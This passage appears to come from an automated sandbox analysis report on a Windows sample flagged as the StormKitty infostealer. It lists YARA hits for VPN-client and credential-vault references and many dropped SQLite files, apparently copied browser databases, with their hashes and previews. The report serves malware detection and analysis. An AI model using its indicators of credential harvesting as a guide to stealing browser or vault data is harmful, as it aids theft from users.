                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.~f................................. ........@.. ....................... ............`.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........C................................................................*..*....*..*...r...p*..*....*...*...*...*...*...*...*...*..*...*..6.r...p.o....*....*...*...*...*."..s^...*...>..sf...%.}"...*..*...*..0..........s..........o.....o....*..0..........s..........o.....o....*...sV...*2.o....sR...*...2.o....sL...*....0../.......#..........o.... ....(......(....,..*#........*.N...(....(....o....*".o"...i*...&..lo#...*..".o"...k*...&..lo#...*...0.."..........o......(....,..*.

                                                                  C:\Users\user\AppData\Local\Temp\places.raw

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):5242880
                                                                  Entropy (8bit):0.037963276276857943
                                                                  Encrypted:false
                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp760B.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp761C.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.8553638852307782
                                                                  Encrypted:false
                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp762D.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp763D.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp763E.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp766E.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp767F.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp76DD.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):0.8180424350137764
                                                                  Encrypted:false
                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp76DE.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):0.47147045728725767
                                                                  Encrypted:false
                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp776C.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):0.08235737944063153
                                                                  Encrypted:false
                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmp778C.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):5242880
                                                                  Entropy (8bit):0.037963276276857943
                                                                  Encrypted:false
                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpACEA.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD0A.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.8553638852307782
                                                                  Encrypted:false
                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD0B.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD1C.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD2D.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD5D.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD6D.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD7E.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):0.8180424350137764
                                                                  Encrypted:false
                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAD7F.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):0.47147045728725767
                                                                  Encrypted:false
                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAE2C.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):0.08235737944063153
                                                                  Encrypted:false
                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpAE3C.tmp.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):5242880
                                                                  Entropy (8bit):0.037963276276857943
                                                                  Encrypted:false
